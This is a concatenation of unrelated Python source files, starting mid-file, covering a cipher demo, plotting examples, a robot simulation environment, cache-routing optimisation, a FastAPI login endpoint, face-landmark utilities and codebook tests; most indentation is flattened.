cluster_centers = kmeans.cluster_centers_[k_inds, :] # cluster centers
# cluster_centers = np.random.uniform(low=-100,high=100,size=(N,2))
if return_conf:
return cluster_centers, cluster_per
else:
return cluster_centers
def compute_entropy(self):
# compute the distribution entropy (really slow right now)
self.dist_entropy = np.sum(self.dist_ab * np.log(self.dist_ab), axis=0)
def plot_dist_grid(self, h, w):
# Plots distribution at a given point
plt.figure()
plt.imshow(self.dist_ab_grid[:, :, h, w], extent=[-110, 110, 110, -110], interpolation='nearest')
plt.colorbar()
plt.ylabel('a')
plt.xlabel('b')
def plot_dist_entropy(self):
# Plots distribution at a given point
plt.figure()
plt.imshow(-self.dist_entropy, interpolation='nearest')
plt.colorbar()
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
from secretpy import Gronsfeld, CryptMachine, alphabets as al
from secretpy.cmdecorators import UpperCase, Block, SaveAll
alphabet = al.GERMAN
plaintext = u"schweißgequältvomödentextzürnttypografjakob"
key = (4, 17, 9)
cipher = Gronsfeld()
print(plaintext)
enc = cipher.encrypt(plaintext, key, alphabet)
print(enc)
dec = cipher.decrypt(enc, key, alphabet)
print(dec)
#######################################################
def encdec(machine, plaintext):
print("--------------------------------------------------------------------")
print(plaintext)
enc = machine.encrypt(plaintext)
print(enc)
print(machine.decrypt(enc))
key = (14, 2, 11)
cm0 = CryptMachine(cipher, key)
cm = cm0
cm.set_alphabet(al.ENGLISH)
plaintext = "I don't love non-alphabet characters. I will remove all of them: ^,&@$~(*;?&#. Great!"
encdec(cm, plaintext)
cm = Block(cm, length=5, sep=" ")
cm.set_key((1, 12, 7, 2))
plaintext = "This text is divided by blocks of length 5!"
encdec(cm, plaintext)
cm = SaveAll(cm0)
plaintext = "I love non-alphabet characters. These are : ^,&@$~(*;?&#. That's it!"
encdec(cm, plaintext)
cm.set_alphabet(al.ENGLISH_SQUARE_IJ)
plaintext = "Jj becomes Ii because we use ENGLISH_SQUARE_IJ!"
encdec(cm, plaintext)
cm.set_alphabet(al.JAPANESE_HIRAGANA)
plaintext = u"text いろはにほへと ちりぬるを わかよたれそ つねならむ うゐのおくやま けふこえて あさきゆめみし ゑひもせす !"
encdec(cm, plaintext)
cm = UpperCase(cm)
alphabet = al.GREEK
cm.set_alphabet(alphabet)
plaintext = u"Θέλει αρετή και τόλμη η ελευθερία. (Ανδρέας Κάλβος)"
encdec(cm, plaintext)
'''
schweißgequältvomödentextzürnttypografjakob
wtqävrdxnuhfpgasßghvwxvcxmhvaüxlysxäewseöxf
schweißgequältvomödentextzürnttypografjakob
--------------------------------------------------------------------
I don't love non-alphabet characters. I will remove all of them: ^,&@$~(*;?&#. Great!
wfzbvwcxpbqyonavcmsvnvccoeestdwytzncsozjglznztvssorfglh
idontlovenonalphabetcharactersiwillremoveallofthemgreat
--------------------------------------------------------------------
This text is divided by blocks of length 5!
utpuu qevje kkwuk genfd majmt amnfz nvi
thistextisdividedbyblocksoflength
--------------------------------------------------------------------
I love non-alphabet characters. These are : ^,&@$~(*;?&#. That's it!
J xvxf zvp-bxwjbnlv dthtboagse. Ajfel csq : ^,&@$~(*;?&#. Ajbf'z ku!
I love non-alphabet characters. These are : ^,&@$~(*;?&#. That's it!
--------------------------------------------------------------------
Jj becomes Ii because we use ENGLISH_SQUARE_IJ!
Kv igdatgt Vq dfphwtr dg vem GOTSLTU_ZSVNYG_KV!
Ii becomes Ii because we use ENGLISH_SQUARE_II!
--------------------------------------------------------------------
text いろはにほへと ちりぬるを わかよたれそ つねならむ うゐのおくやま けふこえて あさきゆめみし ゑひもせす !
text うえぶねばまに てるぼゅゃ をすをつろぢ どはにぇり おゐはしごよみ ざぼぎおは くすくょるめす ゑぺれざせ !
text いろはにほへと ちりぬるを わかよたれそ つねならむ うゐのおくやま けふこえて あさきゆめみし ゑひもせす !
--------------------------------------------------------------------
Θέλει αρετή και τόλμη η ελευθερία. (Ανδρέας Κάλβος)
ΙΟΡΖΊ ΊΧΖΥΡ ΠΒΊ ΔΎΝΝΠ Μ ΖΜΞΑΊΈΆΌΒ. (ΆΧΙΣΖΊΩ ΜΒΎΉΠΤ)
ΘΈΛΕΙ ΑΡΕΤΉ ΚΑΙ ΤΌΛΜΗ Η ΕΛΕΥΘΕΡΊΑ. (ΑΝΔΠΈΑΣ ΚΆΛΒΟΣ)
'''
|
# -*- coding: utf-8 -*-
"""
Test programmatically setting log transformation modes.
"""
import initExample ## Add path to library (just for examples; you do not need this)
import numpy as np
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph as pg
app = QtGui.QApplication([])
w = pg.GraphicsLayoutWidget(show=True)
w.setWindowTitle('pyqtgraph example: logAxis')
p1 = w.addPlot(0,0, title="X Semilog")
p2 = w.addPlot(1,0, title="Y Semilog")
p3 = w.addPlot(2,0, title="XY Log")
p1.showGrid(True, True)
p2.showGrid(True, True)
p3.showGrid(True, True)
p1.setLogMode(True, False)
p2.setLogMode(False, True)
p3.setLogMode(True, True)
w.show()
y = np.random.normal(size=1000)
x = np.linspace(0, 1, 1000)
p1.plot(x, y)
p2.plot(x, y)
p3.plot(x, y)
#p.getAxis('bottom').setLogMode(True)
## Start Qt event loop unless running in interactive mode or using pyside.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
|
# Copyright (c) 2021-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import logging
from typing import List
import gym
import numpy as np
from dm_control import mjcf
from bisk.base import BiskEnv
from bisk.features import make_featurizer
from bisk.helpers import add_ball, add_robot, root_with_floor
log = logging.getLogger(__name__)
class BiskSingleRobotEnv(BiskEnv):
def __init__(
self, robot: str, features: str = 'joints', allow_fallover: bool = False
):
super().__init__()
self.allow_fallover = allow_fallover
root = root_with_floor()
_, robot_pos = add_robot(root, robot, 'robot')
self.robot = robot.lower()
frameskip = 5
fs = root.find('numeric', 'robot/frameskip')
if fs is not None:
frameskip = int(fs.data[0])
self.init_sim(root, frameskip)
if self.robot.startswith('halfcheetah'):
# qpos is x_pos, z_pos, y_rot
self.init_qpos[0] = robot_pos[0]
self.init_qpos[1] = robot_pos[2]
elif self.robot.startswith('walker'):
# qpos is z_pos, x_pos, y_rot
self.init_qpos[0] = robot_pos[2]
self.init_qpos[1] = robot_pos[0]
else:
# TODO Verify that this actually corresponds to the torso position?
self.init_qpos[0:3] = robot_pos
self.featurizer = self.make_featurizer(features)
self.observation_space = self.featurizer.observation_space
self.seed()
@property
def is_2d(self):
# TODO sth more proper? But it needs to be callable from init_sim, i.e.
# before the simulator instance is constructed.
return (
self.robot.startswith('halfcheetah')
or self.robot.startswith('walker')
or self.robot == 'testcube2d'
)
@property
def robot_pos(self) -> np.ndarray:
return self.p.named.data.xpos['robot/torso']
def make_featurizer(self, features: str):
return make_featurizer(features, self.p, self.robot, 'robot')
def reset_state(self):
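        # MuJoCo-style reset: small uniform noise on joint positions,
        # Gaussian noise on joint velocities around the initial state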
noise = 0.1
qpos = self.init_qpos + self.np_random.uniform(
low=-noise, high=noise, size=self.p.model.nq
)
qvel = self.init_qvel + noise * self.np_random.randn(self.p.model.nv)
self.p.data.qpos[:] = qpos
self.p.data.qvel[:] = qvel
def get_observation(self):
return self.featurizer()
def fell_over(self) -> bool:
if self.robot.startswith('humanoid'):
zpos = self.robot_pos[2]
return bool(zpos < 0.9)
elif self.robot.startswith('halfcheetah'):
# Orientation pointing upwards and body almost on the ground
up = self.p.named.data.xmat['robot/torso', 'zz']
zpos = self.p.named.data.qpos['robot/rootz']
if up < -0.8 and zpos < 0.12:
return True
elif self.robot.startswith('walker'):
zpos = self.p.named.data.qpos['robot/rootz']
r = self.p.named.data.qpos['robot/rooty']
if zpos < 0.9 or r < -1.4 or r > 1.4:
return True
return False
def step(self, action):
obs, reward, done, info = super().step(action)
if not self.allow_fallover and self.fell_over():
done = True
info['fell_over'] = True
return obs, reward, done, info
class BiskSingleRobotWithBallEnv(BiskSingleRobotEnv):
def __init__(
self, robot: str, features: str = 'joints', allow_fallover: bool = False
):
super().__init__(robot, features, allow_fallover)
self.ball_qpos_idx: List[int] = []
self.ball_qvel_idx: List[int] = []
if self.is_2d:
for j in ['ball-x', 'ball-z', 'ball-ry']:
qppos = self.p.named.model.jnt_qposadr[j]
self.ball_qpos_idx.append(qppos)
qvpos = self.p.named.model.jnt_dofadr[j]
self.ball_qvel_idx.append(qvpos)
else:
qppos = self.p.named.model.jnt_qposadr['ball']
for i in range(3):
self.ball_qpos_idx.append(qppos + i)
qvpos = self.p.named.model.jnt_dofadr['ball']
for i in range(6):
self.ball_qvel_idx.append(qvpos + i)
obs_base = self.featurizer.observation_space
obs_env = gym.spaces.Box(
low=-np.inf,
high=np.inf,
shape=(len(self.ball_qpos_idx) + len(self.ball_qvel_idx),),
dtype=np.float32,
)
self.observation_space = gym.spaces.Dict(
[
('ball', obs_env),
('observation', obs_base),
]
)
self.seed()
def init_sim(self, root: mjcf.RootElement, frameskip: int = 5):
ball_size = 0.15
add_ball(root, 'ball', size=ball_size, mass=0.1, twod=self.is_2d)
super().init_sim(root, frameskip)
def reset_state(self):
super().reset_state()
# Small noise for ball
noise = 0.01
qpos = self.init_qpos + self.np_random.uniform(
low=-noise, high=noise, size=self.p.model.nq
)
qvel = self.init_qvel + noise * self.np_random.randn(self.p.model.nv)
self.p.data.qpos[self.ball_qpos_idx] = qpos[self.ball_qpos_idx]
self.p.data.qvel[self.ball_qvel_idx] = qvel[self.ball_qvel_idx]
def get_observation(self):
ball_qpos = self.p.data.qpos[self.ball_qpos_idx].ravel().copy()
ball_qvel = self.p.data.qvel[self.ball_qvel_idx]
# Ball X/Y position is relative to robot's torso
ball_qpos[0] -= self.robot_pos[0]
if not self.is_2d:
ball_qpos[1] -= self.robot_pos[1]
else:
# Normalize Y rotation to [-pi,pi], as MuJoCo produces large values
# occasionally.
ball_qpos[2] = np.arctan2(
np.sin(ball_qpos[2]), np.cos(ball_qpos[2])
)
return {
'observation': super().get_observation(),
'ball': np.concatenate([ball_qpos, ball_qvel]).astype(np.float32),
}
|
class Solution:
def specialArray(self, nums: List[int]) -> int:
nums.sort()
n = len(nums)
if nums[0] >= n: return n
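        # After sorting ascending, candidate i is valid iff exactly i values are >= i:
        # the largest i elements must all be >= i (nums[n-i] >= i) and, if it exists,
        # nums[n-i-1] must be < i.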
for i in range(1, n + 1):
if nums[n - i - 1] < i <= nums[n - i]: return i
return -1
|
"""
********************************************************************************
compas.utilities
********************************************************************************
.. currentmodule:: compas.utilities
animation
=========
.. autosummary::
:toctree: generated/
:nosignatures:
gif_from_images
colors
======
.. autosummary::
:toctree: generated/
:nosignatures:
i_to_rgb
i_to_red
i_to_green
i_to_blue
i_to_white
i_to_black
rgb_to_hex
color_to_colordict
color_to_rgb
datetime
========
.. autosummary::
:toctree: generated/
:nosignatures:
.. timestamp
decorators
==========
.. autosummary::
:toctree: generated/
:nosignatures:
memoize
itertools
=========
.. autosummary::
:toctree: generated/
:nosignatures:
take
tabulate
tail
consume
nth
all_equal
quantify
padnone
ncycles
dotproduct
flatten
repeatfunc
pairwise
window
roundrobin
powerset
unique_everseen
unique_justseen
iter_except
first_true
random_permutation
random_combination
random_combination_with_replacement
maps
====
.. autosummary::
:toctree: generated/
:nosignatures:
geometric_key
geometric_key2
normalize_values
mixing
======
.. autosummary::
:toctree: generated/
:nosignatures:
mix_in_functions
mix_in_class_attributes
names
=====
.. autosummary::
:toctree: generated/
:nosignatures:
random_name
profiling
=========
.. autosummary::
:toctree: generated/
:nosignatures:
print_profile
xfunc
=====
.. autosummary::
:toctree: generated/
:nosignatures:
XFunc
"""
from __future__ import absolute_import
def valuedict(keys, value, default):
value = value or default
if isinstance(value, dict):
valuedict = {key: default for key in keys}
valuedict.update(value)
else:
valuedict = {key: value for key in keys}
return valuedict
from .animation import *
from .coercing import *
from .colors import *
from .datetime_ import *
from .decorators import *
from .encoders import *
from .itertools_ import *
from .maps import *
from .mixing import *
from .names import *
from .profiling import *
from .remote import *
from .sorting import *
from .xfunc import *
from .xscript import *
from .functions import *
from . import animation
from . import coercing
from . import colors
from . import datetime_
from . import decorators
from . import encoders
from . import itertools_
from . import maps
from . import mixing
from . import names
from . import profiling
from . import remote
from . import sorting
from . import xfunc
from . import xscript
from . import functions
__all__ = []
__all__ += animation.__all__ + coercing.__all__ + colors.__all__
__all__ += datetime_.__all__ + decorators.__all__ + encoders.__all__
__all__ += itertools_.__all__ + maps.__all__ + mixing.__all__ + names.__all__
__all__ += profiling.__all__ + remote.__all__ + sorting.__all__
__all__ += xfunc.__all__ + xscript.__all__
__all__ += functions.__all__
|
import math
import pickle
import networkx as nx
from src.util.gen_files import *
from src.util.virtual_run import *
def caculate_tail(S, C, totalContents):
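    # Tail separator rank: the total number of contents the caches can hold
    # (capped at totalContents), minus the separator ranks already assigned to S[0..N-2].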
N = len(S)
result = 0
if N * C > totalContents:
result = totalContents
else:
result = N * C
for i in range(0, N-1):
result -= S[i]
return result
def get_hop_count(graph, user_i, cache_j):
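    # NOTE: despite its name, this returns the full shortest path (a list of nodes),
    # not the hop count; len(path) - 1 would give the number of hops.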
return nx.dijkstra_path(graph,source=user_i,target=cache_j)
def estimate_traffic(S_tmp, graph,
nearestColorServerInfo , totalColor, uniqueSortedContentList, cacheDict,
serverToColorMap, fileSize, routingTable, warmUpReqDict, runReqDict, clientList):
contentToColorDict = colorizeWithSeparatorRanks(uniqueSortedContentList, S_tmp, totalColor)
estimasted_traffic = runWithColorRouting(graph, cacheDict, contentToColorDict, nearestColorServerInfo,
serverToColorMap, fileSize, routingTable, runReqDict, clientList)
return estimasted_traffic
def evaluate_traffic(S_tmp, graph,
nearestColorServerInfo , totalColor, uniqueSortedContentList, cacheDict,
serverToColorMap, fileSize, routingTable, warmUpReqDict, runReqDict, clientList):
contentToColorDict = colorizeWithSeparatorRanks(uniqueSortedContentList, S_tmp, totalColor)
warmUpColor(graph, cacheDict, contentToColorDict, nearestColorServerInfo, serverToColorMap, fileSize, routingTable, warmUpReqDict, clientList)
estimasted_traffic = runWithColorRouting(graph, cacheDict, contentToColorDict, nearestColorServerInfo,
serverToColorMap, fileSize, routingTable, runReqDict, clientList)
return estimasted_traffic
def isSeparatorRanksValid(S):
for i in range(1, len(S)):
if S[i-1] > S[i]:
return False
return True
def cloneCacheDict(cacheDict):
result = {}
for cacheId in cacheDict:
result[cacheId] = cacheDict[cacheId].clone()
return result
def compute_rank(numberOfColor, cacheServerCapacity, fileSize, graph, nearestColorServerInfo, contentGenerator,
cacheDict, serverToColorMap, warmUpReqNums, runReqNums, clientList, increaseSRs=1, interval="Interval0", parallel_idx=0):
N = int(numberOfColor)
C = int(cacheServerCapacity/ fileSize)
if fileSize < 0:
print(fileSize)
raise Exception('File size must be a positive number for color based algorithms')
numberOfCache = len(cacheDict.keys())
numberOfContent = len(contentGenerator.uniqueSortedContentList[interval])
incr = int(increaseSRs * numberOfContent / 100.0)
S = [0] * N
S_prev = [0] * N
T_min = float("inf")
if N*C > numberOfContent:
S[N-1] = int(numberOfContent)
else:
S[N-1] = N * C
routingTable = {}
warmUpReqDict = {}
runReqDict = {}
tempCacheDict = cloneCacheDict(cacheDict)
if contentGenerator.dist != None:
for client in clientList:
warmUpReqDict[client] = contentGenerator.randomGen(warmUpReqNums)
runReqDict[client] = contentGenerator.randomGen(runReqNums)
# Fill cache
initContentToColorDict = colorizeWithSeparatorRanks(contentGenerator.uniqueSortedContentList[interval], S, numberOfColor)
warmUpColor(graph, tempCacheDict, initContentToColorDict, nearestColorServerInfo, serverToColorMap, fileSize, routingTable, warmUpReqDict, clientList)
else:
intervalIdx = int(interval.replace("Interval", ""))
if intervalIdx == 0 or interval == "noInterval":
for cache in contentGenerator.custom_data:
client = cache.replace("Cache_", "client_")
warmUpReqDict[client] = contentGenerator.custom_data[cache][interval]
runReqDict[client] = contentGenerator.custom_data[cache][interval]
# Fill cache
initContentToColorDict = colorizeWithSeparatorRanks(contentGenerator.uniqueSortedContentList[interval], S, numberOfColor)
warmUpColor(graph, tempCacheDict, initContentToColorDict, nearestColorServerInfo, serverToColorMap, fileSize, routingTable, warmUpReqDict, clientList)
else:
for cache in contentGenerator.custom_data:
client = cache.replace("Cache_", "client_")
runReqDict[client] = contentGenerator.custom_data[cache][interval]
with open("data/saveCacheDict_" + str(parallel_idx) + ".pkl", "wb") as f:
pickle.dump(tempCacheDict, f)
result = {}
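    # Coordinate descent over the separator ranks: sweep S[0..N-2], try candidate
    # values in steps of `incr`, keep the assignment with the lowest estimated
    # traffic, and repeat until S no longer changes.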
while S_prev != S:
S_prev = list(S)
for i in range(0, N-1):
for v in range(S[max(1, i)-1], S[i+1]+1, incr):
S_tmp = list(S)
S_tmp[i] = v
S_tmp[N - 1] = caculate_tail(S_tmp, C, numberOfContent)
if not isSeparatorRanksValid(S_tmp):
break
with open("data/saveCacheDict_" + str(parallel_idx) + ".pkl", "rb") as f:
tempCloneDict = pickle.load(f)
T_est = estimate_traffic(S_tmp, graph, nearestColorServerInfo, N,
contentGenerator.uniqueSortedContentList[interval], tempCloneDict,
serverToColorMap, fileSize, routingTable, warmUpReqDict, runReqDict,
clientList)
if T_est < T_min:
T_min = T_est
S = S_tmp
result = {"cacheDict": tempCloneDict, "S": S}
return result
def estimate_traffic_shortest_path_with_color(S_tmp, graph,
nearestColorServerInfo , totalColor, uniqueSortedContentList, cacheDict, fileSize, routingTable, runReqDict, clientList):
contentToColorDict = colorizeWithSeparatorRanks(uniqueSortedContentList, S_tmp, totalColor)
estimasted_traffic = runWithShortestPath(graph, cacheDict, fileSize, "tag-color", routingTable, runReqDict, clientList, contentToColorDict)
return estimasted_traffic
def evaluate_traffic_shortest_path_with_color(S_tmp, graph,
nearestColorServerInfo , totalColor, uniqueSortedContentList, cacheDict, fileSize, routingTable, warmUpReqDict, runReqDict, clientList):
contentToColorDict = colorizeWithSeparatorRanks(uniqueSortedContentList, S_tmp, totalColor)
warmUpCacheShortestPath(graph, cacheDict, fileSize, "tag-color", routingTable, warmUpReqDict, clientList, contentToColorDict)
    estimated_traffic = runWithShortestPath(graph, cacheDict, fileSize, "tag-color", routingTable, runReqDict, clientList, contentToColorDict)
    return estimated_traffic
def compute_rank_shortest_path_with_color(numberOfColor, cacheServerCapacity, fileSize, graph, nearestColorServerInfo, contentGenerator, cacheDict, warmUpReqNums, runReqNums,
clientList, increaseSRs=1, interval="", parallel_idx=0):
    N = numberOfColor
    if fileSize <= 0:
        print(fileSize)
        raise Exception('File size must be a positive number for color based algorithms')
    C = int(cacheServerCapacity / fileSize)
numberOfCache = len(cacheDict.keys())
numberOfContent = len(contentGenerator.uniqueSortedContentList[interval])
S = [0] * N
S_prev = [0] * N
T_min = float("inf")
if N*C > numberOfContent:
S[N-1] = numberOfContent
else:
S[N-1] = N * C
incr = int(increaseSRs * numberOfContent / 100.0)
routingTable = {}
warmUpReqDict = {}
runReqDict = {}
tempCacheDict = cloneCacheDict(cacheDict)
if contentGenerator.dist != None:
for client in clientList:
warmUpReqDict[client] = contentGenerator.randomGen(warmUpReqNums)
runReqDict[client] = contentGenerator.randomGen(runReqNums)
initContentToColorDict = colorizeWithSeparatorRanks(contentGenerator.uniqueSortedContentList[interval], S, numberOfColor)
warmUpCacheShortestPath(graph, tempCacheDict, fileSize, "tag-color", routingTable, warmUpReqDict, clientList, initContentToColorDict)
else:
intervalIdx = int(interval.replace("Interval", ""))
if intervalIdx == 0 or interval == "noInterval":
for cache in contentGenerator.custom_data:
client = cache.replace("Cache_", "client_")
warmUpReqDict[client] = contentGenerator.custom_data[cache][interval]
runReqDict[client] = contentGenerator.custom_data[cache][interval]
initContentToColorDict = colorizeWithSeparatorRanks(contentGenerator.uniqueSortedContentList[interval], S, numberOfColor)
warmUpCacheShortestPath(graph, tempCacheDict, fileSize, "tag-color", routingTable, warmUpReqDict, clientList, initContentToColorDict)
else:
for cache in contentGenerator.custom_data:
client = cache.replace("Cache_", "client_")
runReqDict[client] = contentGenerator.custom_data[cache][interval]
with open("data/saveCacheDict_" + str(parallel_idx) + ".pkl", "wb") as f:
pickle.dump(tempCacheDict, f)
result = {}
while S_prev != S:
S_prev = list(S)
for i in range(0, N-1):
for v in range(S[max(1, i)-1], S[i+1]+1, incr):
S_tmp = list(S)
S_tmp[i] = int(v)
S_tmp[N - 1] = int(caculate_tail(S_tmp, C, numberOfContent))
if not isSeparatorRanksValid(S_tmp):
break
with open("data/saveCacheDict_" + str(parallel_idx) + ".pkl", "rb") as f:
tempCloneDict = pickle.load(f)
T_est = estimate_traffic_shortest_path_with_color(S_tmp, graph, nearestColorServerInfo, N, contentGenerator.uniqueSortedContentList[interval], tempCloneDict, fileSize, routingTable, runReqDict, clientList)
if T_est < T_min:
T_min = T_est
S = S_tmp
result = {"cacheDict": tempCloneDict, "S": S}
return result |
from jip.dist import setup
requires_java = {
'dependencies':[
## (groupdId, artifactId, version)
('org.slf4j', 'slf4j-api', '1.7.21'),
('ch.qos.logback', 'logback-core', '1.2.2'),
('org.lucee', 'commons-lang', '2.6.0'),
('org.apache.commons', 'commons-math3', '3.6.1'),
# ('org.eclipse', 'eclipse-january', '2.0.2'),
],
'repositories':[
('sonatype-oss-snapshot', 'http://oss.sonatype.org/content/repositories/snapshots/')
]
}
setup(
name='january',
version='0.1',
description='Eclipse January Jython bindings',
long_description='Jython bindings to provide a NumPy-like ndarray',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2.7',
'Topic :: Scientific/Engineering',
'Topic :: Software Development',
],
keywords='array processing',
url='https://github.com/eclipse/january-jython',
author='Peter Chang',
author_email='[email protected]',
license='ALv2',
packages=['january'],
# zip_safe=False,
requires_java=requires_java,
requires=['decorator'], # install_requires is not in Jython 2.7
)
|
from typing import List, Optional
from datetime import timedelta
from fastapi import APIRouter, Depends, HTTPException, status
from fastapi.security import OAuth2PasswordRequestForm
from fastapi.responses import JSONResponse
from webapi.db.dals.user_dal import User, UserDAL
from webapi.db.schemas.token import Token
from webapi.utils.dependencies import DALGetter, get_current_user
from webapi.setting import settings
from webapi.utils import security
router = APIRouter()
@router.post("/login/access_token/", tags=['User'],
response_model=Token, status_code=status.HTTP_201_CREATED)
async def login_access_token(
dal: UserDAL = Depends(DALGetter(UserDAL)),
form_data: OAuth2PasswordRequestForm = Depends()
):
user = await dal.authenticate(
username=form_data.username,
password=form_data.password
)
if not user:
raise HTTPException(
status_code=400, detail="Incorrect email or password"
)
access_token_expires = timedelta(minutes=settings.ACCESS_TOKEN_EXPIRE_MINUTES)
return {
'access_token': security.create_access_token(
user.id, expires_delta=access_token_expires
),
"token_type": "bearer"
}
@router.get('/login/getinfo/', tags=['User'])
async def login_getinfo(
current_user: User = Depends(get_current_user)
):
data = {
'username': current_user.username,
'nickname': current_user.nickname,
'roles': ['admin', ]
}
return JSONResponse(content=data, status_code=status.HTTP_200_OK)
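# Minimal client-side sketch (hypothetical, not part of this module): obtain a token
# from /login/access_token/ and call /login/getinfo/ with it. The base URL, route
# prefix and credentials are placeholders, and `requests` is an assumed dependency.
if __name__ == "__main__":  # pragma: no cover
    import requests

    base = "http://127.0.0.1:8000"
    resp = requests.post(f"{base}/login/access_token/",
                         data={"username": "admin", "password": "secret"})
    token = resp.json()["access_token"]
    info = requests.get(f"{base}/login/getinfo/",
                        headers={"Authorization": f"Bearer {token}"})
    print(info.json())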
|
#!/usr/bin/env python3
"""
face.py
---
Face detection and landmarking utilities.
Relies on `dlib` for face-detection and `PRNet + PyTorch` for landmarking.
"""
import os
import time
import dlib
import numpy as np
import src.utils.utility as _util
from src.models.face.prnet import PRN
_mouth = slice(48, 68)
_right_eyebrow = slice(17, 22)
_left_eyebrow = slice(22, 27)
_right_eye = slice(36, 42)
_left_eye = slice(42, 48)
_nose = slice(27, 36)  # points 27-35 of the 68-point model
_jaw = slice(0, 17)
_face_pts = 68
_mouth_pts = 20
# Shared face detector, landmarker, and reference 3D Model for frontalization.
_face_landmarks_path = "./data/weights/dlib/shape_predictor_68_face_landmarks.dat"
_prn = None
_detector = None
_landmarker = None
def _getSharedLogger():
return _util.getLogger(os.path.basename(__file__).split('.')[0])
def _getSharedPrn(is_dlib=True, gpuIds="0"):
global _prn
if _prn is None:
os.environ['CUDA_VISIBLE_DEVICES'] = gpuIds
_prn = PRN(is_dlib=is_dlib)
return _prn
def _getSharedDetector():
global _detector
if _detector is None:
_detector = dlib.get_frontal_face_detector()
return _detector
def _getSharedLandmarker():
global _landmarker
if _landmarker is None:
_landmarker = dlib.shape_predictor(_face_landmarks_path)
return _landmarker
def detectFaceRects(img, times_to_upsample=2):
rects = _getSharedDetector()(img, times_to_upsample)
return rects
def detectMaxFaceRect(img, times_to_upsample=2):
_getSharedLogger().debug("Detecting maximum face rect for img of shape='%s'...", img.shape)
ts = time.time()
rects = detectFaceRects(img, times_to_upsample=times_to_upsample)
_getSharedLogger().debug("Done! Took '%0.3f' seconds...", time.time() - ts)
assert len(rects) > 0
    maxRectIdx = np.argmax([r.height() * r.width() for r in rects])
rect = rects[maxRectIdx]
rect = rect.left(), rect.right(), rect.top(), rect.bottom()
return rect
def _applyPadding(dims, rect, padding):
""" Apply padding to each side of a rectangle based on width and height percentage. """
assert len(dims) == 3
img_h, img_w, _ = dims
left, right, top, bottom = rect
box_h = bottom - top
box_w = right - left
# Apply bounded padding.
left = max(0, left - int(padding * box_w))
right = min(img_w, right + int(padding * box_w))
top = max(0, top - int(padding * box_h))
bottom = min(img_h, bottom + int(padding * box_h))
return left, right, top, bottom
def detectMaxFace(img, rect=None, times_to_upsample=2, padding=0.2):
assert len(img.shape) == 3
if rect is None:
rect = detectMaxFaceRect(img, times_to_upsample=times_to_upsample)
if padding is not None:
left, right, top, bottom = _applyPadding(img.shape, rect, padding)
else:
left, right, top, bottom = rect
return img[top:bottom, left:right, :]
def extractFace(img, rect, padding=None):
assert len(img.shape) == 3
assert isinstance(rect, tuple) and len(rect) == 4
# Apply padding.
if padding is not None:
assert 0 < padding <= 0.5
rect = _applyPadding(img.shape, rect, padding)
left, right, top, bottom = rect
res = img[top:bottom, left:right, :]
assert all(x > 0 for x in res.shape)
return res, rect
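def _example_extract_largest_face(img_path, padding=0.2):
    """Illustrative usage sketch only (not part of the original module).

    Assumes OpenCV is available for image loading; any HxWx3 image array works.
    """
    import cv2  # hypothetical extra dependency, imported locally for the sketch
    img = cv2.imread(img_path)
    rect = detectMaxFaceRect(img)  # (left, right, top, bottom)
    face, padded_rect = extractFace(img, rect, padding=padding)
    return face, padded_rect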
def computeMaxLandmarks(img, times_to_upsample=2):
""" Computes max face landmarks. """
maxRect = detectMaxFaceRect(img, times_to_upsample=times_to_upsample)
lmks = _getSharedLandmarker()(img, maxRect)
assert lmks is not None, "Failed to compute landmarks for image of shape: '{}'".format(img.shape)
return lmks
def detect3dLandmarks(img, rect=None, is_dlib=False, gpuIds="0"):
""" Extracts 3D landmarks from the largest detected face in each frame of the provided video.
"""
assert len(img.shape) == 3
_getSharedLogger().info("Computing Position Map for img of shape='%s'...", img.shape)
ts = time.time()
pos_map, inp_img = _getSharedPrn(is_dlib=is_dlib, gpuIds=gpuIds).process(img, image_info=rect)
_getSharedLogger().debug("Done! Took '%0.3f' seconds", time.time() - ts)
if pos_map is None:
return None
lmks3d = _getSharedPrn(is_dlib=is_dlib, gpuIds=gpuIds).get_landmarks(pos_map)
if lmks3d is None:
_getSharedLogger().warning("No face detected!")
return lmks3d, inp_img
def detect3dVertices(img, rect=None, is_dlib=True, gpuIds="0"):
assert len(img.shape) == 3
_getSharedLogger().info("Computing Position Map for img of shape='%s'...", img.shape)
ts = time.time()
pos_map, inp_img = _getSharedPrn(is_dlib=is_dlib, gpuIds=gpuIds).process(img, image_info=rect)
_getSharedLogger().debug("Done! Took '%0.3f' seconds", time.time() - ts)
if pos_map is None:
return None
    vertices3d = _getSharedPrn(is_dlib=is_dlib, gpuIds=gpuIds).get_vertices(pos_map)
    if vertices3d is None:
        _getSharedLogger().warning("No face detected!")
    return vertices3d, inp_img
def get3dLandmarks():
assert _getSharedPrn().pos is not None
pos_map = _getSharedPrn().pos
lmks3d = _getSharedPrn().get_landmarks(pos_map)
return lmks3d
def get3dVertices():
assert _getSharedPrn().pos is not None
pos_map = _getSharedPrn().pos
vertices3d = _getSharedPrn().get_vertices(pos_map)
return vertices3d
def getFace(inp, rect):
""" Converts raw landmarks to face landmarks, relative to a face rectangle.
    This is simply a translation of all the xy coordinates: leftwards by the rectangle's left coordinate, and upwards
    by the rectangle's top coordinate.
"""
assert len(inp.shape) == 2 and inp.shape[1] == 3
assert isinstance(rect, tuple) and len(rect) == 4
left, right, top, bottom = rect
res = inp.copy()
res[:, 0] -= left
res[:, 1] -= top
return res
|
import warnings
import tempfile
import os
import numpy as np
import pytest
from starfish.constants import Indices
from starfish.codebook import Codebook
from starfish.intensity_table import IntensityTable
# don't inspect pytest fixtures in pycharm
# noinspection PyUnresolvedReferences
from starfish.test.dataset_fixtures import (
simple_codebook_json, simple_codebook_array, euclidean_decoded_intensities,
per_channel_max_decoded_intensities, loaded_codebook, small_intensity_table)
def test_loading_codebook_from_json(simple_codebook_json):
cb = Codebook.from_json(simple_codebook_json, n_ch=2, n_hyb=2)
assert isinstance(cb, Codebook)
def test_loading_codebook_from_list(simple_codebook_array):
cb = Codebook.from_code_array(simple_codebook_array, n_ch=2, n_hyb=2)
assert isinstance(cb, Codebook)
def test_loading_codebook_without_specifying_ch_hyb_guesses_correct_values(simple_codebook_array):
cb = Codebook.from_code_array(simple_codebook_array)
assert cb.shape == (3, 2, 2)
